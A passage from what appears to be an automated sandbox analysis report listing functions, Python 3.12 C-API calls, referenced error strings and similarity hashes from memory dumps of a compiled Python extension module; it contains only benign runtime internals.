PyErr_Format.PYTHON312 ref: 00007FFBAB6A1852
PyErr_Format.PYTHON312 ref: 00007FFBAB6A1891
PyTuple_GetSlice.PYTHON312 ref: 00007FFBAB6A18E8
PyErr_Format.PYTHON312 ref: 00007FFBAB6A196F
PyDict_New.PYTHON312 ref: 00007FFBAB6A19E4
_PyDict_GetItemStringWithError.PYTHON312 ref: 00007FFBAB6A1A18
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6A1A27
PyDict_Next.PYTHON312 ref: 00007FFBAB6A1A70
_PyUnicode_EqualToASCIIString.PYTHON312 ref: 00007FFBAB6A1AA8
PyDict_SetItem.PYTHON312 ref: 00007FFBAB6A1ADE
PyDict_Next.PYTHON312 ref: 00007FFBAB6A1B07
PyErr_Format.PYTHON312 ref: 00007FFBAB6A1B62
PyErr_Format.PYTHON312 ref: 00007FFBAB6A1BAB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A1BF1
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A1C1F

Strings

at least, xrefs: 00007FFBAB6A1997
this function, xrefs: 00007FFBAB6A1B79
%.200s%s takes no positional arguments, xrefs: 00007FFBAB6A1950
at most, xrefs: 00007FFBAB6A164D
%.200s%s missing required keyword-only argument '%s', xrefs: 00007FFBAB6A182C
%.200s%s takes at most %d %sargument%s (%zd given), xrefs: 00007FFBAB6A1555
exactly, xrefs: 00007FFBAB6A165F, 00007FFBAB6A19A9
argument for %.200s%s given by name ('%s') and position (%d), xrefs: 00007FFBAB6A1B3A
%.200s%s missing required argument '%s' (pos %d), xrefs: 00007FFBAB6A1869
'%U' is an invalid keyword argument for %.200s%s, xrefs: 00007FFBAB6A1BA1
function, xrefs: 00007FFBAB6A1563, 00007FFBAB6A1841, 00007FFBAB6A1880, 00007FFBAB6A195E, 00007FFBAB6A1B4C
%.200s%s takes %s %d positional argument%s (%zd given), xrefs: 00007FFBAB6A167E, 00007FFBAB6A19D4
keyword , xrefs: 00007FFBAB6A1519
keywords must be strings, xrefs: 00007FFBAB6A1BBA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_$Dict_Format$ItemString$DeallocErrorNextOccurredWith$EqualSliceTuple_Unicode_strchr
String ID: %.200s%s missing required argument '%s' (pos %d)$%.200s%s missing required keyword-only argument '%s'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%U' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%s') and position (%d)$at least$at most$exactly$function$keyword $keywords must be strings$this function
API String ID: 3559638176-2999033026
Opcode ID: 1f8ef507af8cc2a236b28dc01e6daa758a540280c688015cb7e3079141fe9442
Instruction ID: 710886c6c5974bd498e7cf7695acc493ec9ca52b12158a41ac442d1af1d22cab
Opcode Fuzzy Hash: 1f8ef507af8cc2a236b28dc01e6daa758a540280c688015cb7e3079141fe9442
Instruction Fuzzy Hash: D63261B2A0AB8685EE628F69E8507A9B3B0FB45B84F54A039DE5D43774DF3CE444D700

Function 00007FFBAB6A2150 Relevance: 45.9, APIs: 13, Strings: 13, Instructions: 440COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON312 ref: 00007FFBAB6A22E2
PyErr_Format.PYTHON312 ref: 00007FFBAB6A236F
PyTuple_New.PYTHON312 ref: 00007FFBAB6A24A4
PyErr_Format.PYTHON312 ref: 00007FFBAB6A25EA
PyErr_Format.PYTHON312 ref: 00007FFBAB6A261D
PyDict_New.PYTHON312 ref: 00007FFBAB6A2628
_PyUnicode_EQ.PYTHON312 ref: 00007FFBAB6A26A6
PySequence_Contains.PYTHON312 ref: 00007FFBAB6A273B
PyDict_SetItem.PYTHON312 ref: 00007FFBAB6A2759
PyErr_Format.PYTHON312 ref: 00007FFBAB6A27B2
PyErr_Format.PYTHON312 ref: 00007FFBAB6A27F7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A281A
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A284D

Strings

at least, xrefs: 00007FFBAB6A2564
this function, xrefs: 00007FFBAB6A27D6
'%S' is an invalid keyword argument for %.200s%s, xrefs: 00007FFBAB6A27DD
%.200s%s takes no positional arguments, xrefs: 00007FFBAB6A22D0
at most, xrefs: 00007FFBAB6A2322
%.200s%s takes at most %d %sargument%s (%zd given), xrefs: 00007FFBAB6A226B
%.200s%s missing required argument '%U' (pos %d), xrefs: 00007FFBAB6A260F
exactly, xrefs: 00007FFBAB6A2329, 00007FFBAB6A2575
function, xrefs: 00007FFBAB6A224C, 00007FFBAB6A22BF, 00007FFBAB6A230D, 00007FFBAB6A254F, 00007FFBAB6A25A3, 00007FFBAB6A277A
%.200s%s takes %s %d positional argument%s (%zd given), xrefs: 00007FFBAB6A234D
%.200s%s missing required keyword-only argument '%U', xrefs: 00007FFBAB6A25D1
keyword , xrefs: 00007FFBAB6A2264
argument for %.200s%s given by name ('%U') and position (%d), xrefs: 00007FFBAB6A278B

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_Format$DeallocDict_$ContainsItemSequence_Tuple_Unicode_
String ID: %.200s%s missing required argument '%U' (pos %d)$%.200s%s missing required keyword-only argument '%U'$%.200s%s takes %s %d positional argument%s (%zd given)$%.200s%s takes at most %d %sargument%s (%zd given)$%.200s%s takes no positional arguments$'%S' is an invalid keyword argument for %.200s%s$argument for %.200s%s given by name ('%U') and position (%d)$at least$at most$exactly$function$keyword $this function
API String ID: 3590232122-3030676885
Opcode ID: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
Instruction ID: bb1e48d81341a4b2bd9e35446141e39f50e25dad8443bad3d9c2293ae83065b5
Opcode Fuzzy Hash: 1ff9da88f9a7a57dac390b6711fe79e0e012da9bfee1266b6d806b6e39d40ce2
Instruction Fuzzy Hash: F1124EB264AB4681EE528F69E8906B9B3B4FB44B84F44A03ADE5D43774DF3CE545C700

Function 00007FFBAB6AB980 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 367COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6AB9E5
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6ABAB7
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABACE
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABB13
PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6ABB77
PySet_Contains.PYTHON312 ref: 00007FFBAB6ABB99
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABBAF

Part of subcall function 00007FFBAB6A34A0: PyDict_GetItemWithError.PYTHON312 ref: 00007FFBAB6A34BB
Part of subcall function 00007FFBAB6A34A0: PyErr_Occurred.PYTHON312 ref: 00007FFBAB6A34C9
Part of subcall function 00007FFBAB6A34A0: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A34E1

PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6ABC24
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABC3B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABC7C
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6ABD0F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABD26

Part of subcall function 00007FFBAB6A3880: PyThreadState_Get.PYTHON312 ref: 00007FFBAB6A38A2
Part of subcall function 00007FFBAB6A3880: PyErr_Fetch.PYTHON312 ref: 00007FFBAB6A38BA
Part of subcall function 00007FFBAB6A3880: PyCode_NewEmpty.PYTHON312 ref: 00007FFBAB6A38CD
Part of subcall function 00007FFBAB6A3880: PyFrame_New.PYTHON312 ref: 00007FFBAB6A38E7
Part of subcall function 00007FFBAB6A3880: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3902
Part of subcall function 00007FFBAB6A3880: _PyErr_ChainExceptions1.PYTHON312 ref: 00007FFBAB6A390D

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABA4D

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6ABF1D

Strings

str, xrefs: 00007FFBAB6ABEDC
bool, xrefs: 00007FFBAB6ABA23, 00007FFBAB6ABAE9, 00007FFBAB6ABE3B
set, xrefs: 00007FFBAB6ABB81
feed, xrefs: 00007FFBAB6AB9FA, 00007FFBAB6ABA84, 00007FFBAB6ABB4E, 00007FFBAB6ABC4D, 00007FFBAB6ABCD4, 00007FFBAB6ABD61, 00007FFBAB6ABDDA, 00007FFBAB6ABE75, 00007FFBAB6ABEEE
str or None, xrefs: 00007FFBAB6ABCA0, 00007FFBAB6ABD4A

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Err_$Object_Vectorcall$ChainCode_ContainsDict_EmptyErrorExceptions1FetchFormatFrame_FromItemLong_MethodNumber_ObjectOccurredSet_Ssize_tState_SubtypeThreadType_With
String ID: bool$feed$set$str$str or None
API String ID: 2120016896-82482222
Opcode ID: e10df2e8b84fc016c60972893c28a7248685ceeda9d69689395281560c33c246
Instruction ID: 2103547beac271d8c040dd9f6ddec1f1c71a302cbd5729a8900d5bc5ff7d5f06
Opcode Fuzzy Hash: e10df2e8b84fc016c60972893c28a7248685ceeda9d69689395281560c33c246
Instruction Fuzzy Hash: CC021FB1A4B60285EE569F79EC513B9A3B0FF44784F88E039DE6D066B5DE3EE4448700

Function 00007FFBAB6AAE50 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 384COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AAEFA
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AAF11
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AAF56
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6AAFBE
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AAFD5
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AB016
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AB054
PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6AB0AF
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AB117
PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6AB15D

Part of subcall function 00007FFBAB6A3880: PyThreadState_Get.PYTHON312 ref: 00007FFBAB6A38A2
Part of subcall function 00007FFBAB6A3880: PyErr_Fetch.PYTHON312 ref: 00007FFBAB6A38BA
Part of subcall function 00007FFBAB6A3880: PyCode_NewEmpty.PYTHON312 ref: 00007FFBAB6A38CD
Part of subcall function 00007FFBAB6A3880: PyFrame_New.PYTHON312 ref: 00007FFBAB6A38E7
Part of subcall function 00007FFBAB6A3880: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3902
Part of subcall function 00007FFBAB6A3880: _PyErr_ChainExceptions1.PYTHON312 ref: 00007FFBAB6A390D

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AB3F3

Strings

str, xrefs: 00007FFBAB6AB426, 00007FFBAB6AB45E
bool, xrefs: 00007FFBAB6AAF2C, 00007FFBAB6AB02C, 00007FFBAB6AB0ED, 00007FFBAB6AB1B7
feed, xrefs: 00007FFBAB6AAEC7, 00007FFBAB6AAFE7, 00007FFBAB6AB066, 00007FFBAB6AB0C4, 00007FFBAB6AB172, 00007FFBAB6AB2F5, 00007FFBAB6AB39E, 00007FFBAB6AB433, 00007FFBAB6AB46A

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_Vectorcall$Err_Method$ChainCode_EmptyExceptions1FetchFrame_FromLong_Number_Ssize_tState_Thread
String ID: bool$feed$str
API String ID: 476165880-2613659865
Opcode ID: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
Instruction ID: 77dcfb08927ab62c9b9fb09c5dc72d251dcb59d87bf8368f77f2c7b2a4482ec8
Opcode Fuzzy Hash: 7f2e8c55a4eeca045cf774529f01804e1fee1cd08f798284cff5715901533d5d
Instruction Fuzzy Hash: A3023CB1A4B64281EA669F79EC513B9B3B1FF45784F88E039CE2D066B5DE3DE4448700

Function 00007FFBAB6A9740 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAB6A2920: PyLong_FromSsize_t.PYTHON312 ref: 00007FFBAB6A2961
Part of subcall function 00007FFBAB6A2920: PyNumber_Add.PYTHON312 ref: 00007FFBAB6A29B7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29D7
Part of subcall function 00007FFBAB6A2920: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A29EB

PyObject_RichCompare.PYTHON312 ref: 00007FFBAB6A978F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A97A6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A97F6
PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6A9841
PySet_Contains.PYTHON312 ref: 00007FFBAB6A9884
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A989A
PyObject_Vectorcall.PYTHON312 ref: 00007FFBAB6A98E8
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A98FF
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9944
PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6A997B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9BE5

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Strings

bool, xrefs: 00007FFBAB6A97CC, 00007FFBAB6A991A, 00007FFBAB6A99A4, 00007FFBAB6A9A65, 00007FFBAB6A9B09
set, xrefs: 00007FFBAB6A984B
feed, xrefs: 00007FFBAB6A9862, 00007FFBAB6A9B4C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_$Vectorcall$CompareContainsErr_FormatFromLong_MethodNumber_RichSet_Ssize_tSubtypeType_
String ID: bool$feed$set
API String ID: 588643045-561237756
Opcode ID: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
Instruction ID: a01ca7cb78431bdd4d1744ec6348f5b06d5a387038f1b72f971777bb90f76e4a
Opcode Fuzzy Hash: 2ce494273f180fa024b86351a584eddda6a252b5bae88b763fbfbb79a573f59b
Instruction Fuzzy Hash: 74D1FBB1A4AA0281EF629B7DEC513B5E3B1AF45B90F58E039CE2D066F5DE3DE4408710

Function 00007FFBAB6A1D70 Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 216stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(?,?,?,?,?,00007FFBAB6A21A1), ref: 00007FFBAB6A1E19

Strings

more argument specifiers than keyword list entries (remaining format:'%s'), xrefs: 00007FFBAB6A1F69
%, xrefs: 00007FFBAB6A1DF6
Invalid format string ($ specified twice), xrefs: 00007FFBAB6A1F9E
Invalid format string (| specified twice), xrefs: 00007FFBAB6A1F8C
Invalid format string (@ specified twice), xrefs: 00007FFBAB6A1FB0
Invalid format string (@ without preceding | and $), xrefs: 00007FFBAB6A1FA7
Empty parameter name after $, xrefs: 00007FFBAB6A1F95
More keyword list entries (%d) than format specifiers (%d), xrefs: 00007FFBAB6A1FD5
Invalid format string ($ before |), xrefs: 00007FFBAB6A1F83
Empty keyword parameter name, xrefs: 00007FFBAB6A1E3C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: strchr
String ID: %$Empty keyword parameter name$Empty parameter name after $$Invalid format string ($ before |)$Invalid format string ($ specified twice)$Invalid format string (@ specified twice)$Invalid format string (@ without preceding | and $)$Invalid format string (| specified twice)$More keyword list entries (%d) than format specifiers (%d)$more argument specifiers than keyword list entries (remaining format:'%s')
API String ID: 2830005266-262724644
Opcode ID: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
Instruction ID: 3a4f68406ce2e6d3ae55133db4364ea78c48588abc286ffef8110f20fcda7be8
Opcode Fuzzy Hash: 38c6c7fd6f791c59d1b5912cc3173f5b2923cab9302d414a8e120c7176cfda89
Instruction Fuzzy Hash: 589183B1A0AA4282EF568B38E850278B7F4FB45B94F54A539CE6D47BB4DF3CE4519300

Function 00007FFBAB6A1060 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

_PyObject_LookupAttrId.PYTHON312 ref: 00007FFBAB6A10BF
PyList_Append.PYTHON312 ref: 00007FFBAB6A10E6
_PyObject_FastCall.PYTHON312 ref: 00007FFBAB6A1104
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A111D
PyList_New.PYTHON312 ref: 00007FFBAB6A1148
PyList_SetSlice.PYTHON312 ref: 00007FFBAB6A118C
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A11A4
PyList_AsTuple.PYTHON312 ref: 00007FFBAB6A11C2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A11D9
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A11F5
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A1209
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A1222

Strings

__mro_entries__ must return a tuple, xrefs: 00007FFBAB6A11EB

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$List_$Object_$AppendAttrCallErr_FastLookupSliceStringTuple
String ID: __mro_entries__ must return a tuple
API String ID: 1865160900-2385075324
Opcode ID: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
Instruction ID: 7888515668981f6560eeb9103636295281f99d68242993da521633e8505b23d9
Opcode Fuzzy Hash: b039deb2464f2060ae4a0bd026d99ad7f7f16f43939d06b91a08d2db725bb474
Instruction Fuzzy Hash: FD5151B2A0A64286EF168F79ED24379A7B1BF46B85F08E035CE2D46674DF3DE4419300

Function 00007FFBAB6A3EE0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

PyObject_GetAttrString.PYTHON312 ref: 00007FFBAB6A3F10
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A3F3F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3F53
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3F6C
PyDict_New.PYTHON312 ref: 00007FFBAB6A3F93
PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A3FB9
PyErr_ExceptionMatches.PYTHON312 ref: 00007FFBAB6A3FD1
PyErr_Clear.PYTHON312 ref: 00007FFBAB6A3FDF
PyDict_SetItem.PYTHON312 ref: 00007FFBAB6A3FF0
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4007
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4033

Strings

__mypyc_attrs__ is not a tuple, xrefs: 00007FFBAB6A3F35
__mypyc_attrs__, xrefs: 00007FFBAB6A3F01

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Err_$AttrDict_Object_String$ClearExceptionItemMatches
String ID: __mypyc_attrs__$__mypyc_attrs__ is not a tuple
API String ID: 2346549887-4201147154
Opcode ID: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
Instruction ID: 725668d5b473d381bfecb95f5dc22b25b0ecb4629cd994feca0654790ce20cab
Opcode Fuzzy Hash: e66151341709f08fa87d516288480836e991296861bc7efaf3a726328e6597ee
Instruction Fuzzy Hash: 7D4127B1A1AA4282EA568F6AED54379B3B0BB44F94F44E039CE2D42B70DF3CE4458300

Function 00007FFBAB6A3590 Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 19COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A3599
fprintf.MSPDB140-MSVCRT ref: 00007FFBAB6A35A9

Part of subcall function 00007FFBAB6A1010: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFBAB6A1047

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35B3
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35BC
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBAB6A28DB), ref: 00007FFBAB6A35C2

Strings

__qualname__, xrefs: 00007FFBAB6A3645
fatal: out of memory, xrefs: 00007FFBAB6A35A2
None, xrefs: 00007FFBAB6A35E2
tuple[<%d items>], xrefs: 00007FFBAB6A36E4
%U.%U, xrefs: 00007FFBAB6A3692
builtins, xrefs: 00007FFBAB6A366D
%U%U%s, xrefs: 00007FFBAB6A375E
__module__, xrefs: 00007FFBAB6A3617

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: __acrt_iob_func$__stdio_common_vfprintfabortfflushfprintf
String ID: %U%U%s$%U.%U$None$__module__$__qualname__$builtins$fatal: out of memory$tuple[<%d items>]
API String ID: 3462009215-2533303582
Opcode ID: 3aae54b1b249fabbf7fa54b3ea6166519944189401f5320151bdc15871942efa
Instruction ID: 35bbea6db746ddd601410c58b8ecb92266da6b39552f411067c8fa23d3b04316
Opcode Fuzzy Hash: 3aae54b1b249fabbf7fa54b3ea6166519944189401f5320151bdc15871942efa
Instruction Fuzzy Hash: B7D05BF0D5B51242E60767B8EC7B3B4A335AF54741F40A439CC2E02371CE1C14048310

Function 00007FFBAA464808 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 93COMMON

Download Yara Rule

APIs

PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAA46484D
PyUnicode_Compare.PYTHON312 ref: 00007FFBAA4648B0
_Py_Dealloc.PYTHON312 ref: 00007FFBAA4648C6

Strings

invalid normalization form, xrefs: 00007FFBAA46492A
NFD, xrefs: 00007FFBAA4648F0
NFKD, xrefs: 00007FFBAA464908
NFC, xrefs: 00007FFBAA464839
NFKC, xrefs: 00007FFBAA4648D0

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
